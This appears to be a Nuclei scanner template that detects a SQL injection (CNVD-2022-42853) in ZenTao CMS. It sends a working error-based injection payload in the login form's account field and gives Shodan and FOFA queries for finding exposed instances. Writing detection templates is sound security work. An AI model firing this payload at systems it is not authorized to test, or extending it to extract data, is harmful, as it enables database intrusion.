43 lines
1.4 KiB
YAML
43 lines
1.4 KiB
YAML
id: CNVD-2022-42853
|
|
|
|
info:
|
|
name: ZenTao CMS - SQL Injection
|
|
author: ling
|
|
severity: critical
|
|
description: |
|
|
ZenTao CMS contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
|
|
reference:
|
|
- https://github.com/z92g/ZentaoSqli/blob/master/CNVD-2022-42853.go
|
|
- https://www.cnvd.org.cn/flaw/show/CNVD-2022-42853
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
|
cvss-score: 10
|
|
cwe-id: CWE-89
|
|
cpe: cpe:2.3:a:easycorp:zentao:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
shodan-query: http.title:"zentao"
|
|
fofa-query: "Zentao"
|
|
product: zentao
|
|
vendor: easycorp
|
|
tags: cnvd,cnvd2022,zentao,sqli
|
|
variables:
|
|
num: "999999999"
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /zentao/user-login.html HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Referer: {{BaseURL}}/zentao/user-login.html
|
|
|
|
account=admin'+and++updatexml(1,concat(0x1,md5({{num}})),1)+and+'1'='1
|
|
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'c8c605999f3d8352d7bb792cf3fdb25'
|
|
# digest: 4a0a0047304502203028bf2f5eb68f153648439deea4734c16f74ca19da04e67e6b622643ae019d1022100d35df625601a074793a0c5117c0091854e62d35dbb70b028d6dfceb9e5c243bd:922c64590222798bb761d5b6d8e72950 |